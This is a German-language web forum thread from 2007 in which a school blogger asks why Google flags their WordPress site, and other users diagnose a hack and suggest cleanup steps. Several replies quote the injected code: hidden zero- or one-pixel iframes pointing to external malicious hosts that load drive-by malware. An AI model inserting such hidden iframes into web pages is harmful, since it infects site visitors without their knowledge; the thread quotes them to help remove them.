Virus-Schleuder im Blog

  • Seite heute steht bei allen Googleeinträgen unserer Seite (Weblog und Online-Magazin der Christophorusschule Oberurff, CJD-Schule, Realschule, Gymnasium, Internat, Legastheniezentrum » CJD-Update, Weblog und Online-Magazin der Jugenddorf Christophorusschule Oberurff) "kann ihren Computer schädigen". Ein Kollege hat dann festgestellt, dass von meiner Seite diverse Aufforderungen bei ihm ausgelöst werden:

    Ich vermute, es liegt an einem Plugin. Wär nett, wenn jemand eine Idee hat, den Fall zu bereinigen. WENN es ein Plugin ist, dürfte es auch andere bald treffen.

    DANKE.

    Einmal editiert, zuletzt von Wu_kung (1. August 2007 um 15:20)

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Danke! Ich habe ettliche. Werde mal eine Liste hier einstellen. Gruß.

    P.S. Ich habe allerdings gut 30 Plugins laufen. Wie kann man anhand der Liste und der Version erkennen, ob sie clean sind???

    Einmal editiert, zuletzt von Wu_kung (1. August 2007 um 16:17)

  • Du bist gehackt worden, schau hier das steht am Ende auf jeder Seite:

    PHP
    </div>
    	<!-- Share This END -->
    	<iframe src="http://www.nanoy.org/se.php?id=191" width=1 height=1></iframe>
            <iframe src="http://whccxpufub.hk/dl/adv753.php" width=1 height=1></iframe>
    
    
    </body>
    
    
    </html>
  • DANKE auch für den Hinweis. Aber meine Plugins sind ALLE auf dem neuestesn Stand. Allerdings werden einige nicht mehr gepflegt, der aktuelle Stand ist also eher nicht aktuelle. Bsp. Coutdown von Owen Winkler. Die genannten Plugins habe ich nicht. Gruß.

  • Ich glaube ich habe es: Der faule Code kommt von dem Plugin SHARE THIS. Ob noch mehr faule Eier in meinem Blog sind wird jetzt geprüft. Von dem Plugin aber schon mal Finger weg. GRUSS

  • Ja, es ist möglich, dass der Hacker es später ins Plugin geschrieben hat. Es zeigt sich aber, dass der Code auch vorhin noch da war, wenn man das Plugin von der Downloadpage geholt hat. Aber der Tipp mit dem Plugin Tacker ist super. DANKE. Auch für alle anderen Hinweise.

  • Also ich denke nicht das Share This von Alex King (sofern es um dieses Plugin geht) so etwas enthält.

    Ich sehe auf der Webseite allerdings das mein Plugin wp-table benutzt wird und wenn das Plugin nicht auf den aktuellen Stand gepatch ist dann kommen die über die Datei wptable-button.php rein und modifizieren andere Plugins.

  • Danke für den TRACKER-Hinweis. Arbeitet ganz gut. Bleiben nur wenige Plugins über, die man aber leicht individuell checken kann. Werde den Plugin-Autor über das Problem informieren.

    Einmal editiert, zuletzt von Wu_kung (2. August 2007 um 16:06)

  • Dein Blog ist gehackt worden.
    Siehe folgenden Code in Deinem Template:

    Code
    <iframe src='http://81.95.149.XX/go.php?sid=1' .............</iframe>

    Suche nach den <iframe> Tags in Deinem Template.
    Auch würde ich sofort alle Plugins aktualsieren. Einige Arbeit veraltete Plugins zu finden kann Dir folgendes Plugin abnehmen:
    Wordpress Plugin Tracker

    Auch würde ich sofort das Passwort für WP ändern (und ein möglichst "starkes" PW einsetzen).

    Auch *könnte* Dein Template eine Cross-Site-Scripting Lücke haben.

    Blog über japanische Fotografie Japan-Photo.info

    Einmal editiert, zuletzt von Ferdinand (21. August 2007 um 09:02)

  • Jupp, Virenmeldung auch hier (Opera 9.21 + AntiVir)

    Ganz am Ende deines Quellcodes steht:

    HTML
    <iframe src='http://81.95.149.xxx/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
  • >Suche nach den <iframe> Tags in Deinem Template.

    erledigt!

    >Auch würde ich sofort alle Plugins aktualsieren.erledigt!

    >Auch würde ich sofort das Passwort für WP ändern (und ein möglichst
    > "starkes" PW einsetzen).

    erledigt!

    Kann mir jemand bestätigen das der "Virus" weg ist?

    Danke!
    Yel Nats

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!